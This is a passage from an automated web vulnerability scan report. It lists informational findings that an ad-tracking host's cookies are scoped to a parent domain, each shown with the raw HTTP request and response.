Cookie: aud=ABR4nGNgYGDwXRCoy8DAqG9lK%2FmRQZ2BQUBJxY8NKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMVEyDFNQOsnU8UokEYTImcgyipBisROA4xxQ1MCT2DODcCwiuG6DsE4ZVAXPYerE9YH0zx%2FoP4wRSi7wDEuf5AHgAyMCmY; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgUPf%2F97i7DAyM%2Bla2kh9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydubQNSX22eAFDNQ%2FCcD3y8GHmUBByY0pUBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChdXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCc%2B7Nr; OAID=256d63b06b8b5a8d4fa891a87d791a1a

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:53 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBYy8DAqG9lFzCJQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAMxaPUk%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:30:53 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgsPb%2F97heBgZGfSu7gEkgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2NIOrL7dNAipmBgeknA98vBh5lAQcmoNL%2F%2F8FKgRQjA1AVo9BWS7geoErmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQWLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAE3ytyU%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:30:53 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.31. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408244
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDkw8DAqG%2FlWMPHoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPADupPMQ%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyOf%2F99h9DAyM%2BlaONXwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAihmo6CcD3y8GHmUBByag0v%2B%2FwUqBFCMDUBWj0FZLuB6mnwzMvxiYhTZtQhZi%2BcXApJQ0E24kRBWTUrwXWGglXIhRaNMOZI2MYFUucFUgPgOXTJ06ficH8O7DryBwETN%2BBVytkwgoqG%2FAr4Dz8XL8CrgTdhFSsBO%2FAr6Kt%2FgVyJpdxK8AADqztl4%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:28 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAUwsDAqG%2FlODuLQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAL3dPUc%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:28 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgKOT%2F99htDAyM%2BlaOs7NAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2BdPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQA0xrba; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:28 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.32. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRAUwsDAqG%2FlODuLQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAL3dPUc%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgKOT%2F99htDAyM%2BlaOs7NAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtrQdSX28eBFDMDA%2BdPBr5fDDzKAg5MQKX%2Ff4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQSrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQA0xrba

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:36 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRA0g4GBUd%2FKaclNBnUGBgGlBoYGoHgvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPBBeFkMIMD1GMJLh1CJECoBTPH%2FBVNsvGCKwwhMCZuBKa4ZYO18ohANwmBK5ByYEjgOUVkNpoSeQQxzgzg3AiJYDNF3CMIrgbjsPcTV%2FyDa9SE8U4i%2BAxDn%2BgN5AJdCPgQ%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:36 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaMb%2F77FFDAyM%2BlZOS26CxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBq6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgAPFLc2; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:36 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.33. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRA0g4GBUd%2FKaclNBnUGBgGlBoYGoHgvmBLdBqZ4LoMpwa9gipcZIngTomQ%2FRFAawlsIoRZBlPBBeFkMIMD1GMJLh1CJECoBTPH%2FBVNsvGCKwwhMCZuBKa4ZYO18ohANwmBK5ByYEjgOUVkNpoSeQQxzgzg3AiJYDNF3CMIrgbjsPcTV%2FyDa9SE8U4i%2BAxDn%2BgN5AJdCPgQ%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaMb%2F77FFDAyM%2BlZOS26CxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBq6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgAPFLc2

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:57 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC0loGBUd%2FK6dspBnUGBgGlBoYGoHgvmOK5DKZEt4Epwa9gipcZIncTIrcfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg6ipBpMCRyHmOIGpoSeQZwbAeEVQ%2FQdgvBKIC57D9GuD3H8PwhlCtF3AOJcfyAPAOu1Plw%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:57 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgaO3%2F77GxDAyM%2BlZO306BxBg4nGWVWBgYzjIw%2FAeKvwFSjAwMkrfXgKgvt48BKWYGBu6fDHy%2FGHiUBRyYgEr%2F%2FwIrBVKMDEBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChFXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCYn7d6; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:35:57 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.34. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDhxsDAqG8VcbmTQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeADd3Pa0%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsgwu3%2F9%2FAjDAyM%2BlYRlztBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtTQNSX2%2BuAFDMDg9BPBr5fDDzKAg5MQKX%2FH4GVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQBLgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBYVrRj

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 13:16:07 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAjzsDAqG%2BVvteOQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKPxPTA%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:07 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgRvz%2F9%2BDPDAyM%2Blbpe%2B1AYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvNIOrL7blAipmBQfgnA98vBh5lAQcmoNL%2FF8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1ioHi7EKLRpB7JGRrAqF7gqEJ%2BBS6ZOHb%2BTA3j34VcQuIgZvwKu1kkEFNQ34FfA%2BXg5fgXcCbsIKdiJXwFfxVv8CmTNLuJXAADN7bIU; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:07 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.35. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRC4hoGBUd%2FKnsuFQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAFZXPOU%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgcM3%2F73FxDAyM%2Blb2XC4gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0NIOrL7VNAipmBgfknA98vBh5lAQcmoNL%2F%2F8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoDVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAALT7Z1

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:07 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBkz8DAqG%2Fl6B7KoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPAEBwPMk%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:07 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgyP7%2F99jTDAyM%2BlaO7qEgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O21IOrL7eNAipmBgeUnA98vBh5lAQcmoNL%2Fv8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoJVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAABXLrZs; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:34:07 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.36. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBYy8DAqG9lFzCJQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAMxaPUk%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgsPb%2F97heBgZGfSu7gEkgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2NIOrL7dNAipmBgeknA98vBh5lAQcmoNL%2F%2F8FKgRQjA1AVo9BWS7geoErmXwzMQps2IQux%2FGJgUkqaCTcSoopJKd4LLLQWLsQotGkHskZGsCoXuCoQn4FLpk4dv5MDePfhVxC4iBm%2FAq7WSQQU1DfgV8D5eDl%2BBdwJuwgp2IlfAV%2FFW%2FwKZM0u4lcAAE3ytyU%3D

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:31:40 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC4hoGBUd%2FKnsuFQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAFZXPOU%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:31:40 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgcM3%2F73FxDAyM%2Blb2XC4gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0NIOrL7VNAipmBgfknA98vBh5lAQcmoNL%2F%2F8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoDVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAALT7Z1; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:31:40 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.37. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=login&referrer=http%3A//www.wcax.com/global/link.asp%3FL%3D104054%26function%3Dmanageprofile%26mode%3Dcreate%26referrer%3Dhttp%253A//www.wcax.com/Global/link.asp%253FL%253D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBsz8DAqG%2FlqneZQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKdJPTM%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2P7%2F95jTDAyM%2BlauepdBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA%2B9PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQDJArZm

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:38:29 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
